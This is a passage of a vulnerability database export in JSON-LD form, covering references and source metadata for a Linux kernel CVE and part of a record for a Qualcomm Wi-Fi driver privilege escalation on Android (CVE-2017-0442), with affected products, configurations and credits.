        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2019-19523"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-12362"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0431"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-25285"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12114"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12362"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-25212"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19523"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-28974"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-14356"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-27835"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-15437"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-25284"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-27786"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14314"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-25643"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11608"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-11608"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24394"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-0431"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-0342"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12464"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19528"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25212"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25643"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25284"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14356"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28974"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27835"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15437"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-36322"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-18811"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18811"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24394"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0342"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25285"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.4_release_notes/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27786"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14347"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8286"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-28196"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-15358"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-25712"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13543"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-9951"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13434"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-3842"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13776"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24977"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8231"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3121"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-10878"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-29362"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-9948"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8285"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-9169"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-26116"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14363"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13584"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-26137"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14360"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-29361"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-27619"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-9983"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3177"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3326"
      },
      {
        "trust": 0.2,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-25013"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-2708"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14345"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14344"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23336"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14362"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14361"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8927"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10543"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-29363"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-10543"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3842"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14346"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-10228"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10878"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8284"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-27618"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29660"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29661"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27815"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28588"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/665.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36322"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14346"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20305"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13776"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13434"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14345"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13543"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13584"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14347"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14360"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2136"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14344"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-u"
      },
      {
        "trust": 0.1,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33909"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33909"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26541"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26541"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-006"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33034"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25039"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15586"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25037"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36242"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25037"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28935"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-16845"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25035"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14866"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25038"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21645"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25040"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27783"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24330"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25042"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25042"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25038"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25659"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25032"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25041"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25036"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25032"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21643"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25215"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24331"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25036"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-30465"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25035"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21644"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2121"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24332"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25039"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25040"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25041"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2122"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21642"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25034"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4752-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15436"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24490"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10135"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25641"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29369"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27152"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28915"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29371"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27673"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25656"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-44.50~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27777"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29568"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25668"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27675"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25669"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1019.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1023.24"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1024.26"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1016.19"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1021.22"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27830"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-44.50"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29569"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4751-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1023.25"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-377704"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-35508"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-016425"
      },
      {
        "db": "PACKETSTORM",
        "id": "162654"
      },
      {
        "db": "PACKETSTORM",
        "id": "162626"
      },
      {
        "db": "PACKETSTORM",
        "id": "162837"
      },
      {
        "db": "PACKETSTORM",
        "id": "163584"
      },
      {
        "db": "PACKETSTORM",
        "id": "162877"
      },
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "PACKETSTORM",
        "id": "161555"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-1668"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-35508"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-377704"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-35508"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-016425"
      },
      {
        "db": "PACKETSTORM",
        "id": "162654"
      },
      {
        "db": "PACKETSTORM",
        "id": "162626"
      },
      {
        "db": "PACKETSTORM",
        "id": "162837"
      },
      {
        "db": "PACKETSTORM",
        "id": "163584"
      },
      {
        "db": "PACKETSTORM",
        "id": "162877"
      },
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "PACKETSTORM",
        "id": "161555"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-1668"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-35508"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-03-26T00:00:00",
        "db": "VULHUB",
        "id": "VHN-377704"
      },
      {
        "date": "2021-03-26T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-35508"
      },
      {
        "date": "2021-12-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-016425"
      },
      {
        "date": "2021-05-19T14:06:16",
        "db": "PACKETSTORM",
        "id": "162654"
      },
      {
        "date": "2021-05-19T13:56:20",
        "db": "PACKETSTORM",
        "id": "162626"
      },
      {
        "date": "2021-05-27T13:28:54",
        "db": "PACKETSTORM",
        "id": "162837"
      },
      {
        "date": "2021-07-21T16:02:50",
        "db": "PACKETSTORM",
        "id": "163584"
      },
      {
        "date": "2021-06-01T14:45:29",
        "db": "PACKETSTORM",
        "id": "162877"
      },
      {
        "date": "2021-02-25T15:31:12",
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "date": "2021-02-25T15:31:02",
        "db": "PACKETSTORM",
        "id": "161555"
      },
      {
        "date": "2021-02-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202102-1668"
      },
      {
        "date": "2021-03-26T17:15:12.203000",
        "db": "NVD",
        "id": "CVE-2020-35508"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-12T00:00:00",
        "db": "VULHUB",
        "id": "VHN-377704"
      },
      {
        "date": "2021-04-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-35508"
      },
      {
        "date": "2021-12-02T09:13:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-016425"
      },
      {
        "date": "2023-02-03T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202102-1668"
      },
      {
        "date": "2023-02-12T23:41:00.150000",
        "db": "NVD",
        "id": "CVE-2020-35508"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "PACKETSTORM",
        "id": "161555"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-1668"
      }
    ],
    "trust": 0.8
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Initialization vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-016425"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-1668"
      }
    ],
    "trust": 0.6
  }
}

var-201702-0757
Vulnerability from variot

An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32871330. References: QC-CR#1092497. Android is a Linux-based open source operating system jointly developed by Google Inc. and the Open Handheld Alliance. QualcommWi-Fidriver in Android on several Google devices has security vulnerabilities that allow remote attackers to exploit vulnerabilities to escalate permissions through special malicious applications. Google Nexus/ Pixel products are prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-32402310, A-32402604, A-32450647, A-32454494, A-32451171, A-32451104, A-33252788, A-32872662, A-32871330, A-32877494 and A-32879283

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201702-0757",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "android",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "android",
        "scope": null,
        "trust": 0.8,
        "vendor": "google",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01397"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001491"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0442"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-292"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:google:android:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "7.1.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0442"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hao Chen and Guang Gong of Alpha Team, Qihoo 360 Technology Co. Ltd",
    "sources": [
      {
        "db": "BID",
        "id": "96047"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2017-0442",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
